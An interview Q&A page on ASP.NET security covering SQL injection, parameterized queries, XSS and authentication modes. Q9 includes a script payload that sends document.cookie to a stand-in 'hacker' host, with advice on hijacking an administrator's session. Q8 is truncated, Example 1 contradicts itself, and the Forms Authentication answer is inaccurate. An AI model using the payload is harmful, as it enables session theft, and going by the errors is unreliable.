ASP.NET Security Impersonation Interview Questions and Answers for 5 Years Experienced

ASP.NET security interview questions and answers for developers with 3-5 years of experience.
Latest ASP.NET security interview questions with answers.
Hi friends, here I come with ASP.NET security related questions for experienced developers. This set contains 10 questions related to ASP.NET security.
So let's start.

ASP.NET SECURITY INTERVIEW QUESTIONS SET-1

Q 1:- What will you do to make your code more secure?
Ans:- I will review my code from the beginning and understand the security issues that are possible in the code; after that I will resolve them.

Q 2:- How much time will you set for the review? Is there any time limit if you are not finding security issues?
Ans:- I will set a reasonable time limit on my review, and then optimize my review for this limit. If I find myself spending too much time in any one area (especially if it is not a high-priority area or objective), then I flag it for later review and move on.

Q 3:- What will you do if you do not have much time for an ASP.NET project security review?
Ans:- I will limit my reviews to small, manageable pieces of code. This allows me to finish quickly, stay focused, and find a larger number of security issues in the code I am examining.

Q 4:- What is the difference between Authentication and Authorization?
Ans:- Authentication means validating users. In this step, we verify user credentials to check whether the person trying to log in is the right one or not.
Authorization, on the other hand, is keeping track of what the current user is allowed to see and what should be hidden from him.

Q 5:- What do you understand by a SQL injection attack?
Ans:- A SQL injection attack occurs when untrusted input can modify the logic of a SQL query in unexpected ways.

Q 6:- What will you do to prevent SQL injection?
Ans:- I will use parameterized and typed stored procedures.
The typed SQL parameter checks the type and length of the input, and it ensures that the userName input value is treated as a literal value and not as executable code in the database.

Q 7:- If you are not using stored procedures and are using plain SQL statements instead, what will you do to prevent SQL injection?
Ans:- If the code does not use stored procedures, make sure that it uses parameters in the SQL statements it constructs, as shown in the following example.
select status from Users where UserName=@userName
I will check that the code does not use the following approach, where the input is used directly to construct the executable SQL statement by using string concatenation.
string sql = "select status from Users where UserName='"
+ txtUserName.Text + "'";
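
An added example, not code from the original page: the two approaches from Q 6 and Q 7 side by side in C# with System.Data.SqlClient, showing that the typed parameter keeps the input out of the SQL text. The class and method names, the 50-character column width and the sample input are assumptions made for illustration.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

static class UserStatusLookup
{
    // Assumed width of the Users.UserName column (not given on the page).
    const int MaxUserNameLength = 50;

    // The approach the answer rejects: input becomes part of the SQL text.
    public static string BuildConcatenated(string userName)
    {
        return "select status from Users where UserName='" + userName + "'";
    }

    // The approach the answer recommends: fixed SQL text, typed parameter.
    public static SqlCommand BuildParameterized(string userName)
    {
        if (userName == null || userName.Length > MaxUserNameLength)
            throw new ArgumentException("userName is missing or too long");
        var cmd = new SqlCommand("select status from Users where UserName=@userName");
        cmd.Parameters.Add("@userName", SqlDbType.NVarChar, MaxUserNameLength).Value = userName;
        return cmd;
    }

    // Runs the parameterized query; connectionString is supplied by the caller.
    public static object GetStatus(string connectionString, string userName)
    {
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = BuildParameterized(userName))
        {
            cmd.Connection = conn;
            conn.Open();
            return cmd.ExecuteScalar();
        }
    }

    static void Main()
    {
        // Constructed sample input containing a quote and SQL keywords.
        string input = "alice' OR '1'='1";
        // Concatenation: the quote in the input closes the literal early.
        Console.WriteLine(BuildConcatenated(input));
        // Parameterized: the SQL text is unchanged; the input is only data.
        using (var cmd = BuildParameterized(input))
            Console.WriteLine("{0}  [@userName = {1}]", cmd.CommandText, cmd.Parameters["@userName"].Value);
    }
}
```

Main only builds the commands and prints them, so it runs without a database; GetStatus is the call an application would make against a real connection.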

Q 8:- What do you understand by XSS?
Ans:- Cross-site scripting (also known as XSS or CSS) 

Q 9:- What is Cross-site scripting (XSS)?
Ans:- Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. 

Example 1.
For example, the HTML snippet:
<title>Example document: %(title)</title>

is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML being emitted to the browser:
<title>Example document: XSS Doc</title>
A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:
<SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
Sitting on the other end, at the web server, you will be receiving hits where after a double space is the user's cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their session ID and hijack the session.

Q 10:- What is the difference between Windows and Forms Authentication?
Ans:- Windows Authentication: is provided so that web pages can make use of the local Windows users and groups. In it, the actual Windows login name and password are used for authentication.

Forms Authentication: under Forms Authentication, users are able to create their own login name and password. It is basically a cookie-based authentication system which stores the login name and password in a database file.
